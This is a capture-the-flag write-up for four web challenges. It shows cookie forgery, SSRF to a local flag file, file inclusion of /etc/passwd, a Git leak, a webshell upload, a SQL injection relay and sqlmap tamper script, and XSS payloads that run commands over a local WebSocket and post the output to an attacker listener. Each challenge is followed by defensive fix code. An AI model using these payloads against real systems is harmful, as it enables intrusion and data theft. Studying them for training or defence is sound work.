WEB 1

http://117.34.117.216/

Register any account and log in.

When the cookie is set, it is simply the base64 encoding of the username; change it to the base64 encoding of admin.

After logging in, there is a change-password link in the top right corner.

Reset admin's password, then log in again.

Enter http://127.0.0.1/flag.php as the remote image address and the flag can be read.
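The flag is readable because the "remote image address" is fetched by the server without any check on where it points (SSRF). The following is an added example, not code from the challenge or the writeup, of how a fetcher should validate such a URL before connecting: only http(s), no credentials in the URL, and every address the host resolves to must be public. The DNS table and the hostnames in it are constructed so the example runs offline; `system_resolver` is what a deployment would pass instead.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the example runs offline; a deployment uses system_resolver.
FAKE_DNS = {
    "img.example.org": ["93.184.216.34"],
    "localtest.example": ["127.0.0.1"],   # a public name that points at loopback
    "intranet.example": ["10.0.0.5"],     # a public name that points at RFC 1918 space
}


def table_resolver(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror("constructed resolver: unknown host %s" % host)


def system_resolver(host):
    # Real resolution: every A/AAAA address the name currently maps to.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip):
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 range checks apply.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_remote_image_url(url, resolver=system_resolver):
    """Return (ok, reason).

    ok is True only for http(s) URLs without userinfo whose host is, or resolves
    exclusively to, public addresses. The fetcher must then connect to one of the
    addresses checked here rather than resolving the name a second time, or a
    DNS rebinding race can swap in a private address between check and use.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    # IP literals (IPv4, or IPv6 in brackets) are checked directly; names are resolved.
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError) as e:
            return False, "resolution failed: %s" % e
    if not addresses:
        return False, "no addresses"
    for ip in addresses:
        if not is_public_address(ip):
            return False, "host resolves to non-public address %s" % ip
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://127.0.0.1/flag.php", "http://localtest.example/a.jpg",
              "http://img.example.org/a.jpg"):
        print(u, validate_remote_image_url(u, table_resolver))
```

Failing closed on resolution errors and on any non-public address in the answer set is deliberate: a name that returns one public and one private address is rejected as a whole.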

WEB 2

There is a file inclusion and a Git leak.

http://117.34.116.192/index.php?file=/etc/passwd

http://117.34.116.192/.git

Use the Git leak to get the source code; in it, upload.php can upload files.

<?php
// Administrator(): every input to this check comes from the client's own cookies.
function Administrator($value){
    // The "signature" in in_adminexpire is an md5 over cookie values only; no server-side secret is involved.
    if(empty($_COOKIE['in_adminid']) || empty($_COOKIE['in_adminexpire']) || $_COOKIE['in_adminexpire']!==md5($_COOKIE['in_adminid'].$_COOKIE['in_adminname'].$_COOKIE['in_adminpassword'].$_COOKIE['in_permission'])){
        return False;
    }
    setcookie("in_adminexpire",$_COOKIE['in_adminexpire'],time()+1800);
    if(!empty($_COOKIE['in_permission'])){
        // in_permission is a comma-separated list of permission ids; upload requires 2
        $array=explode(",",$_COOKIE['in_permission']);
        $adminlogined=false;
        for($i=0;$i<count($array);$i++){
            if($array[$i]==$value){$adminlogined=true;}
        }
        if(!$adminlogined){
            return False;
        }
    }else{
        return False;
    }
    return true;
}
if (Administrator(2)){
    if(isset($_FILES['file'])){
        // Extension is fixed to .jpg, but the content is not checked
        $filename = './img/img'.rand().'.jpg';
        move_uploaded_file($_FILES["file"]["tmp_name"],$filename);
        header('Refresh:3,url=index.php?file=upload.php');
        echo "Upload $filename Success!";
        die;
    }
}else{
    header('Refresh:3,url=index.php?file=login.html');
    echo "Who are you!";
    die;
}
?>

Constructing the cookie is easy. First upload a one-line webshell,

then include it.
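The reason the cookie is easy to construct is that the md5 in in_adminexpire is computed purely from values the client sends, so the "signature" proves nothing. As an added example, not part of the writeup or the challenge code, the Python below mirrors the page's check (`weak_admin_check`) beside a session cookie whose tag is an HMAC keyed with a server-side secret (`issue_session` / `strong_admin_check`): the tag cannot be produced without the key, the permissions and expiry are covered by it, and comparison is constant-time. The secret value and the cookie layout are constructed for the example.

```python
import hashlib
import hmac

COOKIE_FIELDS = ("in_adminid", "in_adminname", "in_adminpassword", "in_permission")


def weak_tag(fields):
    """The tag the page's Administrator() expects: md5 over the cookie values themselves.
    Nothing here is secret, so any client can compute it for values of its choosing."""
    return hashlib.md5("".join(fields.get(k, "") for k in COOKIE_FIELDS).encode()).hexdigest()


def weak_admin_check(cookies, required_perm):
    """Mirror of the page's Administrator() in Python."""
    if not cookies.get("in_adminid") or not cookies.get("in_adminexpire"):
        return False
    if cookies["in_adminexpire"] != weak_tag(cookies):
        return False
    perms = cookies.get("in_permission", "")
    if not perms:
        return False
    return str(required_perm) in perms.split(",")


def issue_session(secret, admin_id, permissions, expires_at):
    """Server-side issuance: payload plus an HMAC-SHA256 tag keyed with a secret the client never sees."""
    payload = "%s|%s|%d" % (admin_id, ",".join(str(p) for p in permissions), expires_at)
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "|" + tag


def strong_admin_check(secret, cookie, required_perm, now):
    """Verify the tag first (constant-time), then expiry, then the permission."""
    try:
        admin_id, perms, expires_at, tag = cookie.rsplit("|", 3)
        expires_at = int(expires_at)
    except ValueError:
        return False
    payload = "%s|%s|%d" % (admin_id, perms, expires_at)
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False
    if expires_at <= now:
        return False
    return str(required_perm) in perms.split(",")


if __name__ == "__main__":
    # Constructed values: a cookie set entirely by the client passes the weak check.
    client = {"in_adminid": "1", "in_adminname": "admin", "in_adminpassword": "x", "in_permission": "1,2"}
    client["in_adminexpire"] = weak_tag(client)
    print("weak check:", weak_admin_check(client, 2))

    secret = b"constructed-server-secret"     # in practice: loaded from config, 32 random bytes
    c = issue_session(secret, 1, [1], 2000)
    print("strong check, tampered permissions:",
          strong_admin_check(secret, c.replace("|1|", "|1,2|", 1), 2, 1000))
```

Note that the weak scheme also stores the password in a cookie and lets the client choose its own expiry; the signed scheme carries only an id, a permission list and a server-chosen expiry.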

The flag obtained turned out to be PM9SCREW-encrypted; a paid decryption site can decrypt it.

WEB 3

http://45.76.49.10:8001/

Opening it directly in a desktop browser redirects to Qzone (QQ空间), which brought to mind a recent Xianzhi (先知) article:

https://xz.aliyun.com/t/2322

Capturing the traffic showed two requests; the first loads a JS file.

The JS retrieved is encrypted.

document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("..."))))

Here the ciphertext is base64-decoded => RC4-decrypted => URL-decoded, and then written into the current page. A small change to this line is enough to get the plaintext.

Find the request that sends the username and password:

if (!err){
    $.ajax({
        url:'/f701fee85540b78d08cb276d14953d58',
        type:'POST',
        dataType:'json',
        data: "data="+encodeURIComponent(encryptByDES($('#loginform').serialize(),key)),
        error:function(er){
            window.location.href='https://qzone.qq.com';
        }
    })
}

The data sent is DES-encrypted first; print the plaintext and the key to see them.

Testing showed that the password field is injectable, so I wrote a PHP relay script.

<?php
$ip = $_GET['ip'];
$name = $_GET['name'];
$pwd = $_GET['pwd'];
// Rebuild the form body that the site's loginform serializes (field names taken from the site)
$p = "ip={$ip}&hrUW3PG7mp3RLd3dJu={$name}&LxMzAX2jog9Bpjs07jP={$pwd}";

// DES-ECB with PKCS#5-style padding, matching the client-side encryptByDES().
// Note: the mcrypt extension was removed from PHP core in 7.2.
function des_encrypt($str, $key) {
    $block = mcrypt_get_block_size('des', 'ecb');
    $pad = $block - (strlen($str) % $block);
    $str .= str_repeat(chr($pad), $pad);
    return mcrypt_encrypt(MCRYPT_DES, $key, $str, MCRYPT_MODE_ECB);
}
$c = urlencode(base64_encode(des_encrypt($p,"MiaoMiao")));
$post = "data=".$c;
// $post = ['data' => $c]; // passing an array makes curl send multipart/form-data (as for a file upload)! This cost me a long time.

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Requested-With: XMLHttpRequest',));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$ch_out = curl_exec($ch);
curl_close($ch);
echo $ch_out; // pass the upstream response back so the relay can be used as the target

Or write a sqlmap tamper:

#!/usr/bin/env python

from lib.core.enums import PRIORITY
from pyDes import des, ECB, PAD_PKCS5
import base64

__priority__ = PRIORITY.LOW


def des_enc(key, data):
    # DES-ECB with PKCS#5 padding, matching the site's client-side encryptByDES()
    k = des(key, ECB, pad=None, padmode=PAD_PKCS5)
    encrypted = k.encrypt(data)
    return base64.b64encode(encrypted).decode()


def dependencies():
    pass


def tamper(payload, **kwargs):
    # Put the injected value into the form body the site expects, then encrypt the whole body;
    # sqlmap URL-encodes the returned string itself.
    p = "ip=1&hrUW3PG7mp3RLd3dJu=1&LxMzAX2jog9Bpjs07jP=%s" % payload
    return des_enc(b"MiaoMiao", p.encode())
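The DES layer in the page's JS only hides the form body from casual inspection: the key sits in the client, so the server still receives attacker-chosen field values, and the password field ends up in a query unparameterised. As an added example (not the challenge's back end, which the writeup does not show), the sqlite3 snippet below puts a string-built login query next to a parameterised one and runs the same inputs through both. The table, user and the password being stored in clear are constructed to keep the toy small; real code stores a password hash and compares it in application code.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", "s3cret"))
    return conn


def login_concat(conn, name, pwd):
    """Injectable: the decrypted form fields are spliced into the SQL text."""
    q = "SELECT COUNT(*) FROM users WHERE name='%s' AND pwd='%s'" % (name, pwd)
    return conn.execute(q).fetchone()[0] > 0


def login_param(conn, name, pwd):
    """Fixed: the SQL text is constant; values travel as bound parameters and
    can never change the statement's structure."""
    q = "SELECT COUNT(*) FROM users WHERE name=? AND pwd=?"
    return conn.execute(q, (name, pwd)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"          # classic test input for the password field
    print("concat, wrong password :", login_concat(db, "alice", "nope"))
    print("concat, tautology      :", login_concat(db, "alice", tautology))
    print("param, tautology       :", login_param(db, "alice", tautology))
```

Encrypting the request on the client changes nothing here: whatever decrypts on the server is still untrusted input and must be bound as a parameter.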

WEB 4

An unfiltered blind XSS, with a code snippet given as a hint.

package main

// Package clause and imports are not part of the hint; the import paths are assumed.
import (
	"fmt"

	"github.com/AmyangXYZ/sweetygo"
	"github.com/gorilla/websocket"
)

type msg struct {
	Cmd string `json:"cmd"`
}

func main() {
	app := sweetygo.New("./", nil)
	app.GET("/ws", ws)
	app.RunServer(":8002")
}

func ws(ctx *sweetygo.Context) {
	// Upgraded with no Origin check and no authentication
	conn, _ := websocket.Upgrade(ctx.Resp, ctx.Req, ctx.Resp.Header(), 1024, 1024)
	for {
		m := msg{}
		err := conn.ReadJSON(&m)
		if err != nil {
			fmt.Println("Error reading json.", err)
			break
		}

		// exec is not shown in the hint; the client-supplied string is run as a command
		res := exec(m.Cmd)
		fmt.Println(res)
		if err = conn.WriteJSON(res); err != nil {
			fmt.Println(err)
			break
		}
	}
}

It looks like a WebSocket server is started on port 8002, and it executes commands.

So the idea is to use the XSS to connect to the WebSocket and run commands through it.

Also, if you read the whole DOM, you can see the XSS inserted by other players, which is a nice way to see the experts' payloads 😁

payload(1):

<script>
var socket = new WebSocket("ws://127.0.0.1:8002/ws");
socket.onopen = function(e) {
    socket.send(JSON.stringify({cmd:"ls"}))
};
socket.onmessage = function (e) {
    // relies on jQuery already being loaded on the page; "ip" is the author's listener address, left as a placeholder
    $.ajax(
        {
            type: "POST",
            url: "//ip:1027/",
            data: JSON.parse(e.data),
            dataType: "JSON"
        }
    );
};
</script>

payload(2):

<script>
var socket = new WebSocket("ws://127.0.0.1:8002/ws");
socket.onopen = function(e) {
    socket.send(JSON.stringify({cmd:"cat flaaaaag.txt"}))
};
socket.onmessage = function (e) {
    $.ajax(
        {
            type: "POST",
            url: "//ip:1028/",
            data: JSON.parse(e.data),
            dataType: "JSON"
        }
    );
};
</script>
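Both payloads work because a browser will open a WebSocket to 127.0.0.1:8002 from any page that asks, and the server in the hint neither checks the Origin header nor authenticates before running whatever string arrives in cmd. The following is an added example, not code from the challenge, of the two server-side checks that close this: an Origin allowlist applied to the upgrade request, and a fixed command table so the client names an action rather than supplying a command line. The handshake text, the allowed origin and the command table are constructed for the example.

```python
import json

# Constructed: only the application's own page may open the socket.
ALLOWED_ORIGINS = {"http://127.0.0.1:8002"}

# Hypothetical allowlist: a name maps to a fixed argv; the client never supplies a command string.
COMMANDS = {
    "list": ["ls", "-l", "/srv/app/public"],
    "uptime": ["uptime"],
}


def parse_upgrade_request(raw):
    """Split an HTTP request into its request line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_upgrade(raw, allowed_origins=ALLOWED_ORIGINS):
    """Return (ok, reason) for a WebSocket upgrade request.

    Browsers always send Origin on WebSocket handshakes, so a missing or
    foreign Origin is refused before the connection is upgraded. This stops
    cross-site hijacking from a browser; a non-browser client can set any
    Origin, so authentication of the user is still required on top.
    """
    request_line, h = parse_upgrade_request(raw)
    if not request_line.startswith("GET "):
        return False, "not a GET"
    if h.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"
    origin = h.get("origin")
    if origin is None:
        return False, "missing Origin"
    if origin not in allowed_origins:
        return False, "origin not allowed: %s" % origin
    return True, "ok"


def resolve_command(message):
    """Map a {"cmd": name} message to a fixed argv, or None if the name is unknown."""
    try:
        m = json.loads(message)
    except ValueError:
        return None
    name = m.get("cmd") if isinstance(m, dict) else None
    return COMMANDS.get(name)


# Constructed handshakes: one from the app's own page, one from a foreign page.
SAME_ORIGIN = ("GET /ws HTTP/1.1\r\nHost: 127.0.0.1:8002\r\nUpgrade: websocket\r\n"
               "Connection: Upgrade\r\nOrigin: http://127.0.0.1:8002\r\n"
               "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\nSec-WebSocket-Version: 13\r\n\r\n")
CROSS_SITE = SAME_ORIGIN.replace("Origin: http://127.0.0.1:8002", "Origin: http://xss-page.example")

if __name__ == "__main__":
    print("same origin :", check_upgrade(SAME_ORIGIN))
    print("cross site  :", check_upgrade(CROSS_SITE))
    print("cmd uptime  :", resolve_command('{"cmd":"uptime"}'))
    print("cmd free    :", resolve_command('{"cmd":"cat flaaaaag.txt"}'))
```

In gorilla/websocket the place for the Origin decision is the `CheckOrigin` hook of the `Upgrader` type; the older package-level `websocket.Upgrade` function used in the hint leaves Origin checking entirely to the caller.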